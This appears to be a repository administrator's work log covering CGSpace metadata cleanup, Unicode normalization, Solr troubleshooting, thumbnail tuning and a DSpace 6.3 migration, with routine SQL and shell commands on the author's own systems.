    • I manually ran it on the server as the DSpace user and it said “Moving: 51633080 into core statistics-2019”
    • After a few hours it died with the same error that I had seen in the log from the first run:

Exception: Read timed out
+java.net.SocketTimeoutException: Read timed out
+
  • I am not sure how I will fix that shard…
  • I discovered a very interesting tool called ftfy that attempts to fix errors in UTF-8
    • I’m curious to start checking input files with this to see what it highlights
    • I ran it on the authors file from last week and it converted characters like those with Spanish accents from decomposed sequences (a letter followed by a combining accent) to precomposed characters (é→é), which vim identifies as:
      • <e> 101, Hex 65, Octal 145 < ́> 769, Hex 0301, Octal 1401
      • <é> 233, Hex 00e9, Oct 351, Digr e'
  • Ah hah! We need to be normalizing characters into their canonical forms!

In [7]: unicodedata.is_normalized('NFC', 'é')
+Out[7]: False
+
+In [8]: unicodedata.is_normalized('NFC', 'é')
+Out[8]: True
+
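  • For reference, NFC normalization itself can be checked and applied from the command line with Python’s unicodedata module (is_normalized needs Python 3.8 or newer); a minimal sketch, not from the original session, where e\u0301 is the decomposed form of “é”:

$ python3 -c "import unicodedata; s = 'e\u0301'; print(unicodedata.is_normalized('NFC', s), unicodedata.normalize('NFC', s))"
False é
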

2020-01-15

  • I added support for Unicode normalization to my csv-metadata-quality tool in v0.4.0
  • Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:

dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ilri", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
+COPY 144
+dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.bioversity", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
+COPY 1325
  • She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC
  • I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my fix-metadata-values.py script:

$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
+

2020-01-16

  • Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:

dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.ciat", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
+COPY 35
+
  • Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls)
    • We had delayed processing them because DSpace Test (linode19) was testing the CG Core v2 implementation for the last few months
    • Sisay uploaded the records to DSpace Test as IITA_201907_Jan13
    • I started first with basic sanity checks using my csv-metadata-quality tool and found twenty-two items with extra whitespace, invalid multi-value separators, and duplicates, which means Sisay did not do any quality checking on the data
    • I corrected one invalid AGROVOC subject
    • Validate and normalize affiliations against our 2019-04 list using reconcile-csv and OpenRefine:
      • $ lein run ~/src/git/DSpace/2019-04-08-affiliations.csv name id
      • I always forget how to copy the reconciled values in OpenRefine, but you need to make a new column and populate it using this GREL: if(cell.recon.matched, cell.recon.match.name, value)

2020-01-20

  • Last week Atmire sent a quotation for the DSpace 6 upgrade that I had requested a few weeks ago
    • I forwarded it to Peter et al. for their comments
    • We decided that we should probably buy enough credits to cover the upgrade and have 100 remaining for future development
  • Visit CodeObia to discuss the next phase of AReS development

2020-01-21


2020-01-22

  • I tried to create a MaxMind account so I can download the GeoLite2-City database with a license key, but their server refuses to accept me:

Sorry, we were not able to create your account. Please ensure that you are using an email that is not disposable, and that you are not connecting via a proxy or VPN.
+
  • They started limiting public access to the database in December, 2019 due to GDPR and CCPA
    • This will be a problem in the future (see DS-4409)
  • Peter sent me his corrections for the list of authors that I had sent him earlier in the month
    • There were encoding issues when I checked the file in vim and using Python-based tools, but OpenRefine was able to read and export it as UTF-8
    • I will apply them on CGSpace and DSpace Test using my fix-metadata-values.py script:

$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
+
  • Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to csv-metadata-quality:

dspace=# \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
+COPY 67314
+dspace=# \q
+$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
+$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
+
  • Peter asked me to send him a list of affiliations to correct
    • First I decided to export them, run the Unicode normalizations and syntax checks with csv-metadata-quality, and re-import the cleaned-up values:

dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", text_value as "correct", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
+COPY 6170
+dspace=# \q
+$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
+$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
+
  • I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:

$ sleep 4h && time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
  • Then I generated a new list for Peter:

dspace=# \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
+COPY 6162
+
  • Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports (L&R), for example with author “Hung, Nguyen”
    • I generated a report for 2019 and 2020 with each, and I see there are indeed ten more Handles in the results from L&R:

$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u > hung-nguyen-ares-handles.txt
+$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u > hung-nguyen-atmire-handles.txt
+$ wc -l hung-nguyen-a*handles.txt
+  46 hung-nguyen-ares-handles.txt
+  56 hung-nguyen-atmire-handles.txt
+ 102 total
+
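  • To see which Handles are only in the L&R list, something like comm should work, since both files are already sorted (a minimal sketch):

$ comm -13 hung-nguyen-ares-handles.txt hung-nguyen-atmire-handles.txt
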
  • Comparing the lists of items, I see that nine of the ten missing items were added less than twenty-four hours ago, and the other was added last week, so they apparently just haven’t been indexed yet
    • I am curious to check tomorrow to see if they are there

2020-01-23

  • I checked AReS and I see that there are now 55 items for author “Hung Nguyen-Viet”
  • Linode sent an alert that the outbound traffic rate of CGSpace (linode18) was high for several hours this morning around 5AM UTC+1
    • I checked the nginx logs this morning for the few hours before and after that using goaccess:

# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2020:0[12345678]" | goaccess --log-format=COMBINED -
+
  • The top two hosts according to the amount of data transferred are:
    • 2a01:7e00::f03c:91ff:fe9a:3a37
    • 2a01:7e00::f03c:91ff:fe18:7396
  • Both are on Linode, and appear to be the new and old ilri.org servers
  • I will ask the web team
  • Judging from the ILRI publications site, it seems they are downloading the PDFs so they can generate higher-quality thumbnails
  • They are apparently using this Drupal module to generate the thumbnails: sites/all/modules/contrib/pdf_to_imagefield
  • I see some excellent suggestions in this ImageMagick thread from 2012 that lead me to some nice thumbnails (the default PDF density is 72, so supersample to 4X and then resize back to 25%), as well as this blog post:

$ convert -density 288 -filter lagrange -thumbnail 25% -background white -alpha remove -sampling-factor 1:1 -colorspace sRGB 10568-97925.pdf\[0\] 10568-97925.jpg
+
  • Here I’m also explicitly setting the background to white and removing any alpha layers, but I could probably also just keep using -flatten like DSpace already does
  • I did some tests with a modified version of the above that uses -flatten and drops the sampling-factor and colorspace, but bumps up the image size to 600px (the default on CGSpace is currently 300):

$ convert -density 288 -filter lagrange -resize 25% -flatten 10568-97925.pdf\[0\] 10568-97925-d288-lagrange.pdf.jpg
+$ convert -flatten 10568-97925.pdf\[0\] 10568-97925.pdf.jpg
+$ convert -thumbnail x600 10568-97925-d288-lagrange.pdf.jpg 10568-97925-d288-lagrange-thumbnail.pdf.jpg
+$ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
  • This emulates DSpace’s method of generating a high-quality image from the PDF and then creating a thumbnail
  • I put together a proof of concept of this by adding the extra options to dspace-api’s ImageMagickThumbnailFilter.java and it works
  • I need to run tests on a handful of PDFs to see if there are any side effects
  • The file size is about double that of the old ones, but the quality is very good and nowhere near ilri.org’s 400KiB PNG!
  • Peter sent me the corrections and deletions for affiliations last night, so I imported them into OpenRefine to work around the usual UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:

$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
+$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
+$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
+

2020-01-26

  • Add “Gender” to the controlled vocabulary for CRPs (#442)
  • Deploy the changes on CGSpace, run all updates on the server, and reboot it
    • I had to restart the tomcat7 service several times until all Solr statistics cores came up OK
  • I spent a few hours writing a script (create-thumbnails) to compare the default DSpace thumbnails with the improved parameters above, and when comparing them at size 600px I don’t really notice much difference, other than the new ones having slightly crisper text
    • So that was a waste of time, though I think our 300px thumbnails are a bit small now
    • Another thread on the ImageMagick forum mentions that you need to set the density, then read the image, then set the density again:

$ convert -density 288 10568-97925.pdf\[0\] -density 72 -filter lagrange -flatten 10568-97925-density.jpg
+
  • One thing worth mentioning was this syntax for extracting bits from JSON in bash using jq:

$ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
+$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName=="ORIGINAL") | .retrieveLink'
+"/bitstreams/172559/retrieve"
+

2020-01-27

  • Bizu has been having problems when she logs into CGSpace: she can’t see the community list on the front page
    • This last happened for another user in 2016-11, and it was related to the Tomcat maxHttpHeaderSize being too small because the user was in too many groups
    • I see that this case is similar, with this message appearing in the DSpace log just after she logs in:

2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
+
  • Now this appears to be a Solr limit of some kind (“too many boolean clauses”)
    • I changed the maxBooleanClauses for all Solr cores on DSpace Test from 1024 to 2048 and then she was able to see her communities… (see the quick check sketched below)
    • I made a pull request and merged it to the 5_x-prod branch and will deploy it on CGSpace later tonight
    • I am curious if anyone on the dspace-tech mailing list has run into this, so I will try to send a message about it there when I get a chance
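
  • For reference, maxBooleanClauses is set per core in solrconfig.xml, so a quick sanity check across all cores might look like this (a sketch; the path assumes a standard DSpace layout):

$ grep maxBooleanClauses ~/dspace/solr/*/conf/solrconfig.xml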

2020-01-28

  • Generate a list of CIP subjects for Abenet:

dspace=# \COPY (SELECT DISTINCT text_value as "cg.subject.cip", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
+COPY 77
+
+

2020-01-29

  • Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:

UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
+UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
+
  • I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:

dspace=# \COPY (SELECT resource_id as "id", text_value as "dc.identifier.issn" FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
+COPY 23339
+
  • Then, after spending two hours correcting 1,000 ISSNs, I realized that I need to normalize the text_lang fields in the database first, or else these will all look like changes due to the mix of “en_US”, NULL, etc. (for both ISSN and ISBN):

dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
+UPDATE 30454
+
  • Then I realized that my initial PostgreSQL query wasn’t so genius, because if a field already has multiple values it will appear on separate lines with the same ID, so when dspace metadata-import sees it, the change will be removed and added, or added and removed, depending on the order in which it is seen!
  • A better course of action is to select the distinct values and then correct them using fix-metadata-values.py:

dspace=# \COPY (SELECT DISTINCT text_value as "dc.identifier.issn[en_US]", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
+COPY 2900
+
  • I re-applied all my corrections, filtering out things like multi-value separators and values that are actually ISBNs, so I can fix them later
  • Then I applied 181 fixes for ISSNs using fix-metadata-values.py on DSpace Test and CGSpace (after testing locally):

$ ./fix-metadata-values.py -i /tmp/2020-01-29-ISSNs-Distinct.csv -db dspace -u dspace -p 'fuuu' -f 'dc.identifier.issn[en_US]' -m 21 -t correct -d
+

2020-01-30

  • About to start working on the DSpace 6 port, and I’m looking at commits that are in the not-yet-tagged DSpace 6.4:
    • [DS-4342] improve the performance of the collections/collection_id/items REST endpoint:
      • c2e6719fa763e291b81b2d61da2f8c758fe38ff3
    • [DS-4136] Improve OAI import performance for a large install:
      • 3f81daf3d89b17ff4d08783ee9899e5a745851dc
      • 37004bbcf4ca3ef2a74ebc6e4774cb605884864e
    • DS-4110: fix issue in legacy id cleanup of stats records:
      • 3752247d6a4b83ee809cc9b197f34a8ff50b9e74
      • e6004e57f0f2f3ce5f433647fe8a467b0176836b
      • 2fb3751c9adfe7311c6df43dbd51a41479480f5e
    • Fix DS-4066 by update all IDs to string type in schema:
      • f15cb33ab4272a3970572e608810de3076d541a3
    • DS-3914: Fix community defiliation:
      • 19cc9719879cf69019acad72ee13915a4128e859
      • b86a7b8d66608ee2bec67fb69b37e27c9a620aa3
    • [DS-3849] Default ID ‘order by’ clause for other ‘get items’ queries:
      • 7b888fa558e5792cd780d1d6a7f75564f4da3bf9
      • 8d1aa33f7b9ea5a623e1ed13f139695671c598d4
    • [DS-3664] ImageMagick: Only execute “identify” on first page:
      • 33ba419f3560639bff8ea002cdfc38345c0fea8d
    • DS-3658 Configure ReindexerThread disable reindex:
      • 1d2f10592ac2d86f28044749f34ac05347ea0e0a
      • 05959ef315d2a1670e4b59eee4db21f93ba238fa
      • 7253095b623069d7ef0a1a13cc5a21385d0878c9
    • [DS-3602] 6x Port: Incremental Update of Legacy Id fields in Solr Statistics:
      • 184f2b2153479045fba6239342c63e7f8564b8b6
    • Dspace 6 ds 3545 mirage2: custom sitemap.xmap is ignored:
      • 71c68f2f54dead69329298810d0fecdf76b59c09
  • It’s annoying that we have to target DSpace 6.3… I think I should totally cherry-pick these when I’m done (see the sketch below)
  • For now I just created a new DSpace repository, checked out the dspace-6.3 tag, and started diffing and copying changes over from our 5.8 repository
  • There are some things I need to remember to check:
    • search.index settings in DSpace 5’s dspace.cfg (dunno where they are now)
    • thumbnail-fallback-files.xml
  • The code currently lives in the 6_x-dev branch
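
  • Cherry-picking one of those commits onto our branch later would presumably look something like this (a sketch using the first commit above; -x records the original hash in the commit message):

$ git checkout 6_x-dev
$ git cherry-pick -x c2e6719fa763e291b81b2d61da2f8c758fe38ff3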

February, 2020


2020-02-02

  • Continue working on porting CGSpace’s DSpace 5 code to DSpace 6.3, which I started yesterday
    • Sign up for an account with MaxMind so I can get the GeoLite2-City.mmdb database
    • I still need to wire up the API credentials and cron job into the Ansible infrastructure playbooks
    • Fix some minor issues in the config and XMLUI themes, like removing Atmire stuff
    • The code finally builds and runs with a fresh install
  • Now we don’t specify the build environment because site modifications are in local.cfg, so we just build like this:

$ schedtool -D -e ionice -c2 -n7 nice -n19 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package
+
  • And it seems that we need to enable pgcrypto now (used for UUIDs):

$ psql -h localhost -U postgres dspace63
+dspace63=# CREATE EXTENSION pgcrypto;
+CREATE EXTENSION pgcrypto;
+
  • I tried importing a PostgreSQL snapshot from CGSpace and had errors due to missing Atmire database migrations
    • If I try to run dspace database migrate I get the IDs of the migrations that are missing
    • I deleted them manually in psql:

dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
+
  • Then I ran dspace database migrate and got an error:

$ ~/dspace63/bin/dspace database migrate
+
+Database URL: jdbc:postgresql://localhost:5432/dspace63?ApplicationName=dspaceCli
+Migrating database to latest version... (Check dspace logs for details)
+Migration exception:
+java.sql.SQLException: Flyway migration error occurred
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:673)
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:576)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:221)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: org.flywaydb.core.internal.dbsupport.FlywaySqlScriptException:
+Migration V6.0_2015.03.07__DS-2701_Hibernate_migration.sql failed
+-----------------------------------------------------------------
+SQL State  : 2BP01
+Error Code : 0
+Message    : ERROR: cannot drop table metadatavalue column resource_id because other objects depend on it
+  Detail: view eperson_metadata depends on table metadatavalue column resource_id
+  Hint: Use DROP ... CASCADE to drop the dependent objects too.
+Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V6.0_2015.03.07__DS-2701_Hibernate_migration.sql (/home/aorth/src/git/DSpace-6.3/file:/home/aorth/dspace63/lib/dspace-api-6.3.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V6.0_2015.03.07__DS-2701_Hibernate_migration.sql)
+Line       : 391
+Statement  : ALTER TABLE metadatavalue DROP COLUMN IF EXISTS resource_id
+
+        at org.flywaydb.core.internal.dbsupport.SqlScript.execute(SqlScript.java:117)
+        at org.flywaydb.core.internal.resolver.sql.SqlMigrationExecutor.execute(SqlMigrationExecutor.java:71)
+        at org.flywaydb.core.internal.command.DbMigrate.doMigrate(DbMigrate.java:352)
+        at org.flywaydb.core.internal.command.DbMigrate.access$1100(DbMigrate.java:47)
+        at org.flywaydb.core.internal.command.DbMigrate$4.doInTransaction(DbMigrate.java:308)
+        at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:72)
+        at org.flywaydb.core.internal.command.DbMigrate.applyMigration(DbMigrate.java:305)
+        at org.flywaydb.core.internal.command.DbMigrate.access$1000(DbMigrate.java:47)
+        at org.flywaydb.core.internal.command.DbMigrate$2.doInTransaction(DbMigrate.java:230)
+        at org.flywaydb.core.internal.command.DbMigrate$2.doInTransaction(DbMigrate.java:173)
+        at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:72)
+        at org.flywaydb.core.internal.command.DbMigrate.migrate(DbMigrate.java:173)
+        at org.flywaydb.core.Flyway$1.execute(Flyway.java:959)
+        at org.flywaydb.core.Flyway$1.execute(Flyway.java:917)
+        at org.flywaydb.core.Flyway.execute(Flyway.java:1373)
+        at org.flywaydb.core.Flyway.migrate(Flyway.java:917)
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:662)
+        ... 8 more
+Caused by: org.postgresql.util.PSQLException: ERROR: cannot drop table metadatavalue column resource_id because other objects depend on it
+  Detail: view eperson_metadata depends on table metadatavalue column resource_id
+  Hint: Use DROP ... CASCADE to drop the dependent objects too.
+        at org.postgresql.core.v3.QueryExecutorImpl.receiveErrorResponse(QueryExecutorImpl.java:2422)
+        at org.postgresql.core.v3.QueryExecutorImpl.processResults(QueryExecutorImpl.java:2167)
+        at org.postgresql.core.v3.QueryExecutorImpl.execute(QueryExecutorImpl.java:306)
+        at org.postgresql.jdbc.PgStatement.executeInternal(PgStatement.java:441)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:365)
+        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:307)
+        at org.postgresql.jdbc.PgStatement.executeCachedSql(PgStatement.java:293)
+        at org.postgresql.jdbc.PgStatement.executeWithFlags(PgStatement.java:270)
+        at org.postgresql.jdbc.PgStatement.execute(PgStatement.java:266)
+        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:291)
+        at org.apache.commons.dbcp2.DelegatingStatement.execute(DelegatingStatement.java:291)
+        at org.flywaydb.core.internal.dbsupport.JdbcTemplate.executeStatement(JdbcTemplate.java:238)
+        at org.flywaydb.core.internal.dbsupport.SqlScript.execute(SqlScript.java:114)
+        ... 24 more
+
  • I think I might need to update the sequences first… nope
  • Perhaps it’s due to some missing bitstream IDs and I need to run dspace cleanup on CGSpace and take a new PostgreSQL dump… nope
  • Someone in a thread on the dspace-tech mailing list regarding this migration noticed that their database had some views created that were using the resource_id column
  • Our database had the same issue, where the eperson_metadata view was created by something (an Atmire module?) but has no references in the vanilla DSpace code, so I dropped it and tried the migration again:

dspace63=# DROP VIEW eperson_metadata;
+DROP VIEW
+
  • After that the migration was successful, and DSpace starts up successfully and begins indexing
    • xmlui, solr, jspui, rest, and oai are working (rest was redirecting to HTTPS, so I set the Tomcat connector to secure="true" and that fixed it on localhost, but it caused other issues so I disabled it for now)
    • I started diffing our themes against the Mirage 2 reference theme to capture the latest changes

2020-02-03

  • Update the DSpace mimetype fallback images from the KDE Breeze Icons project
  • Issues remaining in the DSpace 6 port of our CGSpace 5.x code:
    • Community and collection pages only show one recent submission (it seems that there is only one item in Solr?)
    • Community and collection pages have tons of “Browse” buttons that we need to remove
    • Order of navigation elements in the right side bar (“My Account” etc.; compare to DSpace Test)
    • The home page trail says “CGSpace Home” instead of “CGSpace Home / Community List” (see DSpace Test)
  • There are lots of errors in the DSpace log, which might explain some of the issues with recent submissions / Solr:

2020-02-03 10:27:14,485 ERROR org.dspace.browse.ItemCountDAOSolr @ caught exception: 
+org.dspace.discovery.SearchServiceException: Invalid UUID string: 1
+2020-02-03 13:20:20,475 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
+org.dspace.discovery.SearchServiceException: Invalid UUID string: 111210
+
  • If I look in Solr’s search core I do actually see items with integers for their resource ID, which I think are all supposed to be UUIDs now…
  • I dropped all the documents in the search core:

$ http --print b 'http://localhost:8080/solr/search/update?stream.body=<delete><query>*:*</query></delete>&commit=true'
+
  • Still didn’t work, so I’m going to try a clean database import and migration:

$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
+$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost dspace_2020-01-27.backup
+$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
+$ psql -h localhost -U postgres dspace63                               
+dspace63=# CREATE EXTENSION pgcrypto;
+dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
+dspace63=# DROP VIEW eperson_metadata;
+dspace63=# \q
+$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
+$ ~/dspace63/bin/dspace database migrate
+
  • I notice that the indexing doesn’t work correctly if I start it manually with dspace index-discovery -b (search.resourceid becomes an integer!)
    • If I induce an indexing by touching dspace/solr/search/conf/reindex.flag the search.resourceid values are all UUIDs… (see below)
  • Speaking of database stuff, there was a performance-related update for the indexes that we used in DSpace 5
    • We might want to apply it in DSpace 6, as it was never merged to 6.x, but it helped with the performance of /submissions in XMLUI for us in 2018-03
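
  • For the record, inducing that indexing is just a matter of touching the flag file in the running install (a sketch; the ~/dspace63 path is an assumption based on my local setup):

$ touch ~/dspace63/solr/search/conf/reindex.flag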

2020-02-04

  • The indexing issue I was having yesterday seems to only present itself the first time a new installation is running DSpace 6
    • Once the indexing induced by touching dspace/solr/search/conf/reindex.flag has finished, subsequent manual invocations of dspace index-discovery -b work as expected
    • Nevertheless, I sent a message to the dspace-tech mailing list describing the issue to see if anyone has any comments
  • I am seeing that the important commits on the unreleased DSpace 6.4 are really numerous, and it might be better for us to target that version
    • I did a simple test and it’s easy to rebase my current 6.3 branch on top of the upstream dspace-6_x branch:

$ git checkout -b 6_x-dev64 6_x-dev
+$ git rebase -i upstream/dspace-6_x
+
  • I finally understand why our themes show all the “Browse by” buttons on community and collection pages in DSpace 6.x
    • The code in ./dspace-xmlui/src/main/java/org/dspace/app/xmlui/aspect/browseArtifacts/CommunityBrowse.java iterates over all the browse indexes and prints them when it is called
    • The XMLUI theme code in dspace/modules/xmlui-mirage2/src/main/webapp/themes/0_CGIAR/xsl/preprocess/browse.xsl calls the template because the id of the div matches “aspect.browseArtifacts.CommunityBrowse.list.community-browse”
    • I checked the DRI of a community page on my local 6.x and on DSpace Test 5.x by appending ?XML to the URL, and I see the ID is missing on DSpace 5.x
    • The issue is the same with the ordering of the “My Account” link, but in Navigation.java
    • I tried modifying preprocess/browse.xsl but it always ends up printing some default list of browse-by links…
    • I’m starting to wonder if Atmire’s modules somehow override this, as I don’t see how CommunityBrowse.java can behave like ours on DSpace 5.x unless they have overridden it (as the open source code is the same in 5.x and 6.x)
    • At least the “account” link in the sidebar is overridden in our 5.x branch because Atmire copied a modified Navigation.java to the local xmlui modules folder… so that explains that (and it’s easy to replicate in 6.x)

2020-02-05

